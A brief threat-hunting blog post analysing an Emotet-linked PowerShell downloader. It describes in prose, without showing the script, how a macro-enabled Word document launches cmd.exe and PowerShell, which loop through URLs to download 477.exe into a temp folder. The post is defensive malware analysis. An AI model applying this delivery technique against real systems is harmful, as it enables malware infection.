Today I wanted to do a real quick post on a PowerShell downloader linked to Emotet. Here is a little background on what Emotet is according to Malwarebytes:
Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive either via malicious script, macro-enabled document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click the malicious files by using tempting language about “Your Invoice,” “Payment Details,” or possibly an upcoming shipment from well-known parcel companies.
The strain I will be looking at was delivered through this word document acquired from https://www.malware-traffic-analysis.net/2019/01/18/index.html
Once the macros inside the document are launched by enabling the content cmd.exe will spawn a PowerShell process.
Lets’ take a look at the contents of the PowerShell script that was kicked off.
So here we can see that it is building a PowerShell download cradle that is iterating through the listed URL’s and attempting to download 477.exe and save it to the AppData\Local\Temp directory. Here is a look at what some of the variables contain.
So thank you for reading and until next time…
Happy hunting,
Marcus
References:
Marcus Edmondson | Threat Hunting | Information Security 
2 thoughts on “PowerShell Downloader – Emotet”